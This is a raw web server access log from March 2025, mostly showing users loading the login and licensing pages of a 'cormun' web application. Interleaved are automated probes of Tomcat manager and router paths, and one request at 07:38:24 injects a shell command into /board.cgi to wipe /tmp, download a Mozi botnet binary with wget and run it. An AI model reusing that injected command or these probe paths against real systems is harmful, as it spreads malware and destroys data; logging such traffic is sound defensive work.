209.141.37.95 - - [05/Mar/2025:00:03:12 -0300] "GET /manager/html HTTP/1.1" 401 2474
8.222.140.234 - - [05/Mar/2025:00:08:04 -0300] "GET / HTTP/1.0" 200 11197
8.222.140.234 - - [05/Mar/2025:00:08:04 -0300] "GET / HTTP/1.1" 200 11217
8.222.140.234 - - [05/Mar/2025:00:08:05 -0300] "GET /favicon.ico HTTP/1.1" 200 21630
8.222.140.234 - - [05/Mar/2025:00:08:05 -0300] "GET /favicon.ico HTTP/1.1" 200 21630
209.141.37.95 - - [05/Mar/2025:00:09:00 -0300] "GET /manager/html HTTP/1.1" 401 2474
141.255.166.90 - - [05/Mar/2025:00:11:23 -0300] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 1013
209.141.37.95 - - [05/Mar/2025:00:15:06 -0300] "GET /manager/html HTTP/1.1" 401 2474
209.141.37.95 - - [05/Mar/2025:00:21:13 -0300] "GET /manager/html HTTP/1.1" 401 2474
209.141.37.95 - - [05/Mar/2025:00:27:20 -0300] "GET /manager/html HTTP/1.1" 401 2474
200.73.230.130 - - [05/Mar/2025:00:32:13 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1721
200.73.230.130 - - [05/Mar/2025:00:32:13 -0300] "GET /cormun/static/gxtimezone.js?85251 HTTP/1.1" 200 5781
200.73.230.130 - - [05/Mar/2025:00:32:13 -0300] "GET /cormun/static/gxcfg.js?2022112219184450 HTTP/1.1" 200 953
200.73.230.130 - - [05/Mar/2025:00:32:13 -0300] "GET /cormun/static/Resources/CormunLogin.png HTTP/1.1" 200 19132
200.73.230.130 - - [05/Mar/2025:00:32:13 -0300] "GET /cormun/static/messages.spa.js?85251 HTTP/1.1" 200 30736
200.73.230.130 - - [05/Mar/2025:00:32:13 -0300] "GET /cormun/static/Resources/Spanish/PXTools.css?1759030 HTTP/1.1" 200 100853
200.73.230.130 - - [05/Mar/2025:00:32:13 -0300] "GET /cormun/static/hlogin.js?2022112219184458 HTTP/1.1" 200 2156
200.73.230.130 - - [05/Mar/2025:00:32:14 -0300] "GET /cormun/static/gxgral.js?85251 HTTP/1.1" 200 384558
200.73.230.130 - - [05/Mar/2025:00:32:14 -0300] "GET /cormun/static/Resources/PXToolsLoginTop.png HTTP/1.1" 200 1337
200.73.230.130 - - [05/Mar/2025:00:32:14 -0300] "GET /cormun/static/Resources/PXToolsLoginBackground.png HTTP/1.1" 200 1164
200.73.230.130 - - [05/Mar/2025:00:32:14 -0300] "GET /cormun/static/Resources/PXToolsButtonRight.png HTTP/1.1" 200 1294
200.73.230.130 - - [05/Mar/2025:00:32:14 -0300] "GET /cormun/static/Resources/PXToolsButtonBackground.png HTTP/1.1" 200 1176
200.73.230.130 - - [05/Mar/2025:00:32:14 -0300] "GET /cormun/static/Resources/PXToolsButtonLeft.png HTTP/1.1" 200 1310
200.73.230.130 - - [05/Mar/2025:00:32:14 -0300] "GET /cormun/static/Resources/PXToolsLoginBottom.png HTTP/1.1" 200 1389
200.73.230.130 - - [05/Mar/2025:00:32:14 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1732
200.73.230.130 - - [05/Mar/2025:00:32:14 -0300] "GET /cormun/static/Resources/indicator.gif HTTP/1.1" 200 1553
200.73.230.130 - - [05/Mar/2025:00:32:14 -0300] "GET /favicon.ico HTTP/1.1" 200 21630
209.141.37.95 - - [05/Mar/2025:00:33:36 -0300] "GET /manager/html HTTP/1.1" 401 2474
209.141.37.95 - - [05/Mar/2025:00:39:48 -0300] "GET /manager/html HTTP/1.1" 401 2474
209.141.37.95 - - [05/Mar/2025:00:46:03 -0300] "GET /manager/html HTTP/1.1" 401 2474
209.141.37.95 - - [05/Mar/2025:00:52:13 -0300] "GET /manager/html HTTP/1.1" 401 2474
209.141.37.95 - - [05/Mar/2025:00:58:24 -0300] "GET /manager/html HTTP/1.1" 401 2474
78.108.177.50 - - [05/Mar/2025:01:02:45 -0300] "GET / HTTP/1.0" 200 11197
141.255.166.90 - - [05/Mar/2025:01:03:02 -0300] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 1013
209.141.37.95 - - [05/Mar/2025:01:04:36 -0300] "GET /manager/html HTTP/1.1" 401 2474
5.239.200.244 - - [05/Mar/2025:01:05:24 -0300] "GET / HTTP/1.1" 200 11217
5.239.200.244 - - [05/Mar/2025:01:05:24 -0300] "GET / HTTP/1.1" 200 11217
209.141.37.95 - - [05/Mar/2025:01:10:44 -0300] "GET /manager/html HTTP/1.1" 401 2474
209.141.37.95 - - [05/Mar/2025:01:16:54 -0300] "GET /manager/html HTTP/1.1" 401 2474
209.141.37.95 - - [05/Mar/2025:01:23:03 -0300] "GET /manager/html HTTP/1.1" 401 2474
209.141.37.95 - - [05/Mar/2025:01:29:08 -0300] "GET /manager/html HTTP/1.1" 401 2474
209.141.37.95 - - [05/Mar/2025:01:35:17 -0300] "GET /manager/html HTTP/1.1" 401 2474
209.141.37.95 - - [05/Mar/2025:01:41:26 -0300] "GET /manager/html HTTP/1.1" 401 2474
20.171.29.66 - - [05/Mar/2025:01:46:28 -0300] "GET / HTTP/1.1" 200 11217
209.141.37.95 - - [05/Mar/2025:01:47:35 -0300] "GET /manager/html HTTP/1.1" 401 2474
209.141.37.95 - - [05/Mar/2025:01:53:44 -0300] "GET /manager/html HTTP/1.1" 401 2474
141.255.166.90 - - [05/Mar/2025:01:57:17 -0300] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 1013
209.141.37.95 - - [05/Mar/2025:02:00:01 -0300] "GET /manager/html HTTP/1.1" 401 2474
209.141.37.95 - - [05/Mar/2025:02:06:15 -0300] "GET /manager/html HTTP/1.1" 401 2474
209.141.37.95 - - [05/Mar/2025:02:12:31 -0300] "GET /manager/html HTTP/1.1" 401 2474
209.141.37.95 - - [05/Mar/2025:02:18:44 -0300] "GET /manager/html HTTP/1.1" 401 2474
209.141.37.95 - - [05/Mar/2025:02:24:56 -0300] "GET /manager/html HTTP/1.1" 401 2474
181.217.170.47 - - [05/Mar/2025:02:27:28 -0300] "GET / HTTP/1.1" 200 11217
209.141.37.95 - - [05/Mar/2025:02:31:15 -0300] "GET /manager/html HTTP/1.1" 401 2474
209.141.37.95 - - [05/Mar/2025:02:37:32 -0300] "GET /manager/html HTTP/1.1" 401 2474
209.141.37.95 - - [05/Mar/2025:02:43:46 -0300] "GET /manager/html HTTP/1.1" 401 2474
141.255.166.90 - - [05/Mar/2025:02:47:57 -0300] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 1013
209.141.37.95 - - [05/Mar/2025:02:50:00 -0300] "GET /manager/html HTTP/1.1" 401 2474
209.141.37.95 - - [05/Mar/2025:02:56:01 -0300] "GET /manager/html HTTP/1.1" 401 2474
161.35.87.217 - - [05/Mar/2025:02:58:54 -0300] "GET / HTTP/1.1" 200 11217
209.141.37.95 - - [05/Mar/2025:03:01:43 -0300] "GET /manager/html HTTP/1.1" 401 2474
199.204.96.10 - - [05/Mar/2025:03:05:50 -0300] "GET /ip HTTP/1.1" 404 965
209.141.37.95 - - [05/Mar/2025:03:07:24 -0300] "GET /manager/html HTTP/1.1" 401 2474
209.141.37.95 - - [05/Mar/2025:03:13:06 -0300] "GET /manager/html HTTP/1.1" 401 2474
209.141.37.95 - - [05/Mar/2025:03:18:49 -0300] "GET /manager/html HTTP/1.1" 401 2474
209.141.37.95 - - [05/Mar/2025:03:24:34 -0300] "GET /manager/html HTTP/1.1" 401 2474
141.255.166.90 - - [05/Mar/2025:03:30:16 -0300] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 1013
209.141.37.95 - - [05/Mar/2025:03:30:22 -0300] "GET /manager/html HTTP/1.1" 401 2474
209.141.37.95 - - [05/Mar/2025:03:36:29 -0300] "GET /manager/html HTTP/1.1" 401 2474
209.141.37.95 - - [05/Mar/2025:03:42:39 -0300] "GET /manager/html HTTP/1.1" 401 2474
209.141.37.95 - - [05/Mar/2025:03:48:49 -0300] "GET /manager/html HTTP/1.1" 401 2474
209.141.37.95 - - [05/Mar/2025:03:54:58 -0300] "GET /manager/html HTTP/1.1" 401 2474
104.234.115.168 - - [05/Mar/2025:03:55:16 -0300] "GET / HTTP/1.0" 200 11197
104.234.115.168 - - [05/Mar/2025:03:55:47 -0300] "GET / HTTP/1.1" 200 11217
104.234.115.168 - - [05/Mar/2025:03:57:53 -0300] "úöX“âfࠊÓË܈²eh÷TáeøIŠ”¥¾1+ÂyÛ ÓiÀ?ªu͸BLÛN!Ž\7 " 400 -
104.234.115.168 - - [05/Mar/2025:03:57:59 -0300] "GET /favicon.ico HTTP/1.1" 200 21630
209.141.37.95 - - [05/Mar/2025:04:01:15 -0300] "GET /manager/html HTTP/1.1" 401 2474
209.141.37.95 - - [05/Mar/2025:04:07:27 -0300] "GET /manager/html HTTP/1.1" 401 2474
209.141.37.95 - - [05/Mar/2025:04:13:37 -0300] "GET /manager/html HTTP/1.1" 401 2474
209.141.37.95 - - [05/Mar/2025:04:19:44 -0300] "GET /manager/html HTTP/1.1" 401 2474
141.255.166.90 - - [05/Mar/2025:04:23:56 -0300] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 1013
209.141.37.95 - - [05/Mar/2025:04:25:54 -0300] "GET /manager/html HTTP/1.1" 401 2474
209.141.37.95 - - [05/Mar/2025:04:32:04 -0300] "GET /manager/html HTTP/1.1" 401 2474
209.141.37.95 - - [05/Mar/2025:04:38:20 -0300] "GET /manager/html HTTP/1.1" 401 2474
87.121.84.131 - - [05/Mar/2025:04:42:46 -0300] "CONNECT ifconfig.co:443 HTTP/1.1" 400 -
87.121.84.131 - - [05/Mar/2025:04:42:46 -0300] "âÞ¸øtC%” D4':¨Å—Z7zE+` ÑÿÓs: IÛ"ZҞ" 400 -
209.141.37.95 - - [05/Mar/2025:04:44:33 -0300] "GET /manager/html HTTP/1.1" 401 2474
209.141.37.95 - - [05/Mar/2025:04:50:52 -0300] "GET /manager/html HTTP/1.1" 401 2474
209.141.37.95 - - [05/Mar/2025:04:57:15 -0300] "GET /manager/html HTTP/1.1" 401 2474
209.141.37.95 - - [05/Mar/2025:05:03:50 -0300] "GET /manager/html HTTP/1.1" 401 2474
209.141.37.95 - - [05/Mar/2025:05:10:14 -0300] "GET /manager/html HTTP/1.1" 401 2474
141.255.166.90 - - [05/Mar/2025:05:15:03 -0300] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 1013
209.141.37.95 - - [05/Mar/2025:05:16:36 -0300] "GET /manager/html HTTP/1.1" 401 2474
46.19.143.26 - - [05/Mar/2025:05:22:33 -0300] "GET / HTTP/1.1" 200 11217
209.141.37.95 - - [05/Mar/2025:05:22:55 -0300] "GET /manager/html HTTP/1.1" 401 2474
209.141.37.95 - - [05/Mar/2025:05:29:22 -0300] "GET /manager/html HTTP/1.1" 401 2474
209.141.37.95 - - [05/Mar/2025:05:35:54 -0300] "GET /manager/html HTTP/1.1" 401 2474
209.141.37.95 - - [05/Mar/2025:05:42:25 -0300] "GET /manager/html HTTP/1.1" 401 2474
159.89.201.183 - - [05/Mar/2025:05:43:32 -0300] "GET / HTTP/1.1" 200 11217
159.89.201.183 - - [05/Mar/2025:05:43:32 -0300] "GET /download/powershell/ HTTP/1.1" 404 1001
159.89.201.183 - - [05/Mar/2025:05:43:33 -0300] "GET /get.php HTTP/1.1" 404 975
209.141.37.95 - - [05/Mar/2025:05:48:54 -0300] "GET /manager/html HTTP/1.1" 401 2474
147.185.132.81 - - [05/Mar/2025:05:52:15 -0300] "GET / HTTP/1.1" 200 11217
209.141.37.95 - - [05/Mar/2025:05:55:23 -0300] "GET /manager/html HTTP/1.1" 401 2474
141.255.166.90 - - [05/Mar/2025:06:01:22 -0300] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 1013
209.141.37.95 - - [05/Mar/2025:06:01:50 -0300] "GET /manager/html HTTP/1.1" 401 2474
209.141.37.95 - - [05/Mar/2025:06:08:16 -0300] "GET /manager/html HTTP/1.1" 401 2474
209.141.37.95 - - [05/Mar/2025:06:14:35 -0300] "GET /manager/html HTTP/1.1" 401 2474
209.141.37.95 - - [05/Mar/2025:06:20:50 -0300] "GET /manager/html HTTP/1.1" 401 2474
209.141.37.95 - - [05/Mar/2025:06:26:38 -0300] "GET /manager/html HTTP/1.1" 401 2474
209.141.37.95 - - [05/Mar/2025:06:32:30 -0300] "GET /manager/html HTTP/1.1" 401 2474
209.141.37.95 - - [05/Mar/2025:06:38:35 -0300] "GET /manager/html HTTP/1.1" 401 2474
209.141.37.95 - - [05/Mar/2025:06:45:04 -0300] "GET /manager/html HTTP/1.1" 401 2474
209.141.37.95 - - [05/Mar/2025:06:51:33 -0300] "GET /manager/html HTTP/1.1" 401 2474
141.255.166.90 - - [05/Mar/2025:06:57:33 -0300] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 1013
209.141.37.95 - - [05/Mar/2025:06:57:53 -0300] "GET /manager/html HTTP/1.1" 401 2474
209.141.37.95 - - [05/Mar/2025:07:04:09 -0300] "GET /manager/html HTTP/1.1" 401 2474
220.132.54.11 - - [05/Mar/2025:07:06:44 -0300] "GET / HTTP/1.0" 200 11197
209.141.37.95 - - [05/Mar/2025:07:10:28 -0300] "GET /manager/html HTTP/1.1" 401 2474
209.141.37.95 - - [05/Mar/2025:07:16:46 -0300] "GET /manager/html HTTP/1.1" 401 2474
190.95.67.91 - - [05/Mar/2025:07:18:53 -0300] "GET /cormun/servlet/trlicencias HTTP/1.1" 200 6046
190.95.67.91 - - [05/Mar/2025:07:18:54 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1733
209.141.37.95 - - [05/Mar/2025:07:23:06 -0300] "GET /manager/html HTTP/1.1" 401 2474
46.19.143.26 - - [05/Mar/2025:07:27:32 -0300] "GET / HTTP/1.1" 200 11217
209.141.37.95 - - [05/Mar/2025:07:29:02 -0300] "GET /manager/html HTTP/1.1" 401 2474
186.11.74.58 - - [05/Mar/2025:07:34:49 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1721
186.11.74.58 - - [05/Mar/2025:07:34:49 -0300] "GET /cormun/static/gxcfg.js?2022112219184450 HTTP/1.1" 304 -
186.11.74.58 - - [05/Mar/2025:07:34:49 -0300] "GET /cormun/static/Resources/CormunLogin.png HTTP/1.1" 200 19132
186.11.74.58 - - [05/Mar/2025:07:34:49 -0300] "GET /cormun/static/messages.spa.js?85251 HTTP/1.1" 200 30736
186.11.74.58 - - [05/Mar/2025:07:34:49 -0300] "GET /cormun/static/Resources/Spanish/PXTools.css?1759030 HTTP/1.1" 200 100853
186.11.74.58 - - [05/Mar/2025:07:34:49 -0300] "GET /cormun/static/hlogin.js?2022112219184458 HTTP/1.1" 304 -
186.11.74.58 - - [05/Mar/2025:07:34:50 -0300] "GET /cormun/static/gxgral.js?85251 HTTP/1.1" 200 384558
186.11.74.58 - - [05/Mar/2025:07:34:50 -0300] "GET /cormun/static/Resources/PXToolsLoginTop.png HTTP/1.1" 304 -
186.11.74.58 - - [05/Mar/2025:07:34:50 -0300] "GET /cormun/static/Resources/PXToolsButtonRight.png HTTP/1.1" 304 -
186.11.74.58 - - [05/Mar/2025:07:34:50 -0300] "GET /cormun/static/Resources/PXToolsButtonLeft.png HTTP/1.1" 304 -
186.11.74.58 - - [05/Mar/2025:07:34:50 -0300] "GET /cormun/static/Resources/PXToolsButtonBackground.png HTTP/1.1" 304 -
186.11.74.58 - - [05/Mar/2025:07:34:50 -0300] "GET /cormun/static/Resources/PXToolsLoginBackground.png HTTP/1.1" 304 -
186.11.74.58 - - [05/Mar/2025:07:34:50 -0300] "GET /cormun/static/Resources/PXToolsLoginBottom.png HTTP/1.1" 304 -
186.11.74.58 - - [05/Mar/2025:07:34:50 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1731
186.11.74.58 - - [05/Mar/2025:07:34:50 -0300] "GET /cormun/static/Resources/indicator.gif HTTP/1.1" 304 -
186.11.74.58 - - [05/Mar/2025:07:34:50 -0300] "GET /favicon.ico HTTP/1.1" 200 21630
186.11.74.58 - - [05/Mar/2025:07:34:52 -0300] "POST /cormun/servlet/hlogin?ae7604e6cd56ae363cb6efd5677df9e5,gx-no-cache=1741170986411 HTTP/1.1" 200 90
186.11.74.58 - - [05/Mar/2025:07:34:52 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 950
186.11.74.58 - - [05/Mar/2025:07:34:52 -0300] "GET /cormun/static/gxcfg.js?20221129847421 HTTP/1.1" 304 -
186.11.74.58 - - [05/Mar/2025:07:34:52 -0300] "GET /cormun/static/Resources/Spanish/PXTools.css?8354383 HTTP/1.1" 200 100853
186.11.74.58 - - [05/Mar/2025:07:34:52 -0300] "GET /cormun/static/hpexe_link.js?20221129847423 HTTP/1.1" 304 -
186.11.74.58 - - [05/Mar/2025:07:34:52 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 3933
186.11.74.58 - - [05/Mar/2025:07:34:52 -0300] "GET /cormun/static/Resources/Spanish/PXTools.css?14345360 HTTP/1.1" 200 100853
186.11.74.58 - - [05/Mar/2025:07:34:52 -0300] "GET /cormun/static/Shared/jqueryui/jquery-ui.min.css?1345370 HTTP/1.1" 200 30288
186.11.74.58 - - [05/Mar/2025:07:34:52 -0300] "GET /cormun/static/gxcfg.js?20201215495537 HTTP/1.1" 304 -
186.11.74.58 - - [05/Mar/2025:07:34:52 -0300] "GET /cormun/static/PXToolsJavascripts/pexe_windows.js HTTP/1.1" 200 15249
186.11.74.58 - - [05/Mar/2025:07:34:52 -0300] "GET /cormun/static/Resources/CormunMP2.png HTTP/1.1" 304 -
186.11.74.58 - - [05/Mar/2025:07:34:52 -0300] "GET /cormun/static/PXToolsJavascripts/pexe_popup.js HTTP/1.1" 200 15149
186.11.74.58 - - [05/Mar/2025:07:34:52 -0300] "GET /cormun/static/Resources/ImgHome.png HTTP/1.1" 304 -
186.11.74.58 - - [05/Mar/2025:07:34:53 -0300] "GET /cormun/static/Resources/ImgLogin.png HTTP/1.1" 304 -
186.11.74.58 - - [05/Mar/2025:07:34:53 -0300] "GET /cormun/static/Resources/Llave.png HTTP/1.1" 304 -
186.11.74.58 - - [05/Mar/2025:07:34:53 -0300] "GET /cormun/static/Shared/ext/locale/ext-lang-en.js HTTP/1.1" 200 10940
186.11.74.58 - - [05/Mar/2025:07:34:53 -0300] "GET /cormun/static/hhome.js?20201215495544 HTTP/1.1" 304 -
186.11.74.58 - - [05/Mar/2025:07:34:53 -0300] "GET /cormun/static/Resources/PXToolsDataTitle.png HTTP/1.1" 304 -
186.11.74.58 - - [05/Mar/2025:07:34:53 -0300] "GET /cormun/static/hwchdr01.js?2022112219251119 HTTP/1.1" 304 -
186.11.74.58 - - [05/Mar/2025:07:34:53 -0300] "GET /cormun/static/hpexe_recentlink.js?20201214471090 HTTP/1.1" 304 -
186.11.74.58 - - [05/Mar/2025:07:34:53 -0300] "GET /cormun/static/hpexe_scripts.js?20201214471411 HTTP/1.1" 304 -
186.11.74.58 - - [05/Mar/2025:07:34:53 -0300] "GET /cormun/static/hpexe_messagecontroller.js?202211298371222 HTTP/1.1" 304 -
186.11.74.58 - - [05/Mar/2025:07:34:53 -0300] "GET /cormun/static/hpexe_messagepopupcomponent.js?2020121447232 HTTP/1.1" 304 -
186.11.74.58 - - [05/Mar/2025:07:34:53 -0300] "GET /cormun/static/cmcontrolpreferences.js?20199141926336 HTTP/1.1" 304 -
186.11.74.58 - - [05/Mar/2025:07:34:53 -0300] "GET /cormun/static/hpexe_messagegenexuscomponent.js?20221129836373 HTTP/1.1" 304 -
186.11.74.58 - - [05/Mar/2025:07:34:53 -0300] "GET /cormun/static/gxui/gxui-all.js HTTP/1.1" 200 107772
186.11.74.58 - - [05/Mar/2025:07:34:53 -0300] "GET /cormun/static/SmoothNavMenu/resources/ddsmoothmenu.js HTTP/1.1" 200 12712
186.11.74.58 - - [05/Mar/2025:07:34:53 -0300] "GET /cormun/static/Shared/jquery/jquery-1.4.2.min.js HTTP/1.1" 200 72174
186.11.74.58 - - [05/Mar/2025:07:34:53 -0300] "GET /cormun/static/scaMessage/js/jquery.pnotify.min.js HTTP/1.1" 200 13038
186.11.74.58 - - [05/Mar/2025:07:34:53 -0300] "GET /cormun/static/scaMessage/scaMessageRender.js HTTP/1.1" 200 11977
186.11.74.58 - - [05/Mar/2025:07:34:53 -0300] "GET /cormun/static/hmpwkw03.js?20221129844354 HTTP/1.1" 304 -
186.11.74.58 - - [05/Mar/2025:07:34:53 -0300] "GET /cormun/static/Shared/jquery/jquery-1.10.2.min.js HTTP/1.1" 200 273199
186.11.74.58 - - [05/Mar/2025:07:34:53 -0300] "GET /cormun/static/Shared/jqueryui/jquery-ui.min.js HTTP/1.1" 200 240427
186.11.74.58 - - [05/Mar/2025:07:34:53 -0300] "GET /cormun/static/Shared/ext/ext-all.js HTTP/1.1" 200 1289687
209.141.37.95 - - [05/Mar/2025:07:34:55 -0300] "GET /manager/html HTTP/1.1" 401 2474
186.11.74.58 - - [05/Mar/2025:07:34:57 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 9065
186.11.74.58 - - [05/Mar/2025:07:34:57 -0300] "GET /cormun/static/calendar.js?85251 HTTP/1.1" 200 26246
186.11.74.58 - - [05/Mar/2025:07:34:57 -0300] "GET /cormun/static/gxcfg.js?202211298463625 HTTP/1.1" 304 -
186.11.74.58 - - [05/Mar/2025:07:34:57 -0300] "GET /cormun/static/gxdec.js?85251 HTTP/1.1" 200 19579
186.11.74.58 - - [05/Mar/2025:07:34:58 -0300] "GET /cormun/static/Resources/PXTools/calendar.png HTTP/1.1" 304 -
186.11.74.58 - - [05/Mar/2025:07:34:58 -0300] "GET /cormun/static/trlicencias.js?202211298463889 HTTP/1.1" 200 41883
186.11.74.58 - - [05/Mar/2025:07:34:58 -0300] "GET /cormun/static/Resources/PXToolsDataSearch.png HTTP/1.1" 304 -
186.11.74.58 - - [05/Mar/2025:07:34:58 -0300] "GET /cormun/static/Shared/ext/resources/css/ext-all.css?215870 HTTP/1.1" 200 416045
186.11.74.58 - - [05/Mar/2025:07:34:58 -0300] "GET /cormun/static/Resources/PXToolsGridFirstDisabled.gif HTTP/1.1" 304 -
186.11.74.58 - - [05/Mar/2025:07:34:58 -0300] "GET /cormun/static/Resources/PXToolsGridPreviousDisabled.gif HTTP/1.1" 304 -
186.11.74.58 - - [05/Mar/2025:07:34:58 -0300] "GET /cormun/static/Resources/PXToolsGridNextDisabled.gif HTTP/1.1" 304 -
186.11.74.58 - - [05/Mar/2025:07:34:58 -0300] "GET /cormun/static/Resources/PXToolsGridLastDisabled.gif HTTP/1.1" 304 -
186.11.74.58 - - [05/Mar/2025:07:34:58 -0300] "GET /cormun/static/Resources/PXToolsAddAllAction.png HTTP/1.1" 304 -
186.11.74.58 - - [05/Mar/2025:07:34:58 -0300] "GET /cormun/static/Resources/PXToolsActionExcel.png HTTP/1.1" 304 -
186.11.74.58 - - [05/Mar/2025:07:34:58 -0300] "GET /cormun/static/Resources/PXToolsGridPage.gif HTTP/1.1" 304 -
186.11.74.58 - - [05/Mar/2025:07:34:58 -0300] "GET /cormun//static/Resources/PXToolsActionDisabled.gif HTTP/1.1" 304 -
186.11.74.58 - - [05/Mar/2025:07:34:58 -0300] "GET /cormun/static/Resources/desc.gif HTTP/1.1" 304 -
186.11.74.58 - - [05/Mar/2025:07:34:58 -0300] "GET /cormun/static/Resources/asc.gif HTTP/1.1" 304 -
186.11.74.58 - - [05/Mar/2025:07:34:58 -0300] "GET /cormun//static/Resources/PXTools/ActionInsert.png HTTP/1.1" 304 -
186.11.74.58 - - [05/Mar/2025:07:34:58 -0300] "GET /cormun//static/Resources/PXToolsActionPrint.png HTTP/1.1" 304 -
186.11.74.58 - - [05/Mar/2025:07:34:58 -0300] "GET /cormun//static/Resources/PXToolsGridDisplay.png HTTP/1.1" 304 -
186.11.74.58 - - [05/Mar/2025:07:34:58 -0300] "GET /cormun//static/Resources/PXToolsHeaderHelp.png HTTP/1.1" 304 -
186.11.74.58 - - [05/Mar/2025:07:34:58 -0300] "GET /cormun//static/Resources/PXToolsHeaderFavorites.png HTTP/1.1" 304 -
201.186.226.3 - - [05/Mar/2025:07:38:16 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1725
201.186.226.3 - - [05/Mar/2025:07:38:17 -0300] "GET /cormun/static/gxtimezone.js?85251 HTTP/1.1" 200 5781
201.186.226.3 - - [05/Mar/2025:07:38:17 -0300] "GET /cormun/static/gxcfg.js?2022112219184450 HTTP/1.1" 200 953
201.186.226.3 - - [05/Mar/2025:07:38:17 -0300] "GET /cormun/static/messages.spa.js?85251 HTTP/1.1" 200 30736
201.186.226.3 - - [05/Mar/2025:07:38:17 -0300] "GET /cormun/static/Resources/CormunLogin.png HTTP/1.1" 200 19132
201.186.226.3 - - [05/Mar/2025:07:38:17 -0300] "GET /cormun/static/Resources/Spanish/PXTools.css?1759030 HTTP/1.1" 200 100853
201.186.226.3 - - [05/Mar/2025:07:38:17 -0300] "GET /cormun/static/hlogin.js?2022112219184458 HTTP/1.1" 200 2156
201.186.226.3 - - [05/Mar/2025:07:38:18 -0300] "GET /cormun/static/gxgral.js?85251 HTTP/1.1" 200 384558
201.186.226.3 - - [05/Mar/2025:07:38:18 -0300] "GET /cormun/static/Resources/PXToolsLoginBackground.png HTTP/1.1" 200 1164
201.186.226.3 - - [05/Mar/2025:07:38:18 -0300] "GET /cormun/static/Resources/PXToolsButtonRight.png HTTP/1.1" 200 1294
201.186.226.3 - - [05/Mar/2025:07:38:18 -0300] "GET /cormun/static/Resources/PXToolsLoginTop.png HTTP/1.1" 200 1337
201.186.226.3 - - [05/Mar/2025:07:38:18 -0300] "GET /cormun/static/Resources/PXToolsButtonLeft.png HTTP/1.1" 200 1310
201.186.226.3 - - [05/Mar/2025:07:38:18 -0300] "GET /cormun/static/Resources/PXToolsLoginBottom.png HTTP/1.1" 200 1389
201.186.226.3 - - [05/Mar/2025:07:38:18 -0300] "GET /cormun/static/Resources/PXToolsButtonBackground.png HTTP/1.1" 200 1176
201.186.226.3 - - [05/Mar/2025:07:38:18 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1735
201.186.226.3 - - [05/Mar/2025:07:38:18 -0300] "GET /cormun/static/Resources/indicator.gif HTTP/1.1" 200 1553
201.186.226.3 - - [05/Mar/2025:07:38:18 -0300] "GET /cormun/static/Resources/indicator.gif HTTP/1.1" 200 1553
103.98.36.214 - - [05/Mar/2025:07:38:24 -0300] "GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://103.98.36.214:47590/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron HTTP/1.0" 404 979
201.186.226.3 - - [05/Mar/2025:07:38:32 -0300] "POST /cormun/servlet/hlogin?6518b64d12b7b58193c486af8d79c37b,gx-no-cache=1741171207667 HTTP/1.1" 200 90
201.186.226.3 - - [05/Mar/2025:07:38:32 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 956
201.186.226.3 - - [05/Mar/2025:07:38:33 -0300] "GET /cormun/static/gxcfg.js?20221129847421 HTTP/1.1" 200 953
201.186.226.3 - - [05/Mar/2025:07:38:33 -0300] "GET /cormun/static/hpexe_link.js?20221129847423 HTTP/1.1" 200 625
201.186.226.3 - - [05/Mar/2025:07:38:33 -0300] "GET /cormun/static/Resources/Spanish/PXTools.css?8354383 HTTP/1.1" 200 100853
201.186.226.3 - - [05/Mar/2025:07:38:33 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 3875
201.186.226.3 - - [05/Mar/2025:07:38:33 -0300] "GET /cormun/static/SmoothNavMenu/resources/ddsmoothmenu.css?1112540 HTTP/1.1" 200 2223
201.186.226.3 - - [05/Mar/2025:07:38:33 -0300] "GET /cormun/static/SmoothNavMenu/resources/ddsmoothmenu-v.css?1112540 HTTP/1.1" 200 1188
201.186.226.3 - - [05/Mar/2025:07:38:33 -0300] "GET /cormun/static/scaMessage/css/jquery.pnotify.default.css?1816380 HTTP/1.1" 200 1707
201.186.226.3 - - [05/Mar/2025:07:38:33 -0300] "GET /cormun/static/gxcfg.js?20201215495537 HTTP/1.1" 200 953
201.186.226.3 - - [05/Mar/2025:07:38:33 -0300] "GET /cormun/static/Shared/jqueryui/jquery-ui.min.css?1345370 HTTP/1.1" 200 30288
201.186.226.3 - - [05/Mar/2025:07:38:33 -0300] "GET /cormun/static/PXToolsJavascripts/pexe_autoreload.js HTTP/1.1" 200 1762
201.186.226.3 - - [05/Mar/2025:07:38:33 -0300] "GET /cormun/static/PXToolsJavascripts/pexe_cookies.js HTTP/1.1" 200 792
201.186.226.3 - - [05/Mar/2025:07:38:33 -0300] "GET /cormun/static/PXToolsJavascripts/pexe_grid.js HTTP/1.1" 200 7559
201.186.226.3 - - [05/Mar/2025:07:38:33 -0300] "GET /cormun/static/PXToolsJavascripts/pexe_griddivfix.js HTTP/1.1" 200 6946
201.186.226.3 - - [05/Mar/2025:07:38:33 -0300] "GET /cormun/static/PXToolsJavascripts/pexe_link.js HTTP/1.1" 200 5671
201.186.226.3 - - [05/Mar/2025:07:38:33 -0300] "GET /cormun/static/Resources/Spanish/PXTools.css?14345360 HTTP/1.1" 200 100853
201.186.226.3 - - [05/Mar/2025:07:38:33 -0300] "GET /cormun/static/PXToolsJavascripts/pexe_windows.js HTTP/1.1" 200 15249
201.186.226.3 - - [05/Mar/2025:07:38:33 -0300] "GET /cormun/static/PXToolsJavascripts/pexe_menudivfix.js HTTP/1.1" 200 333
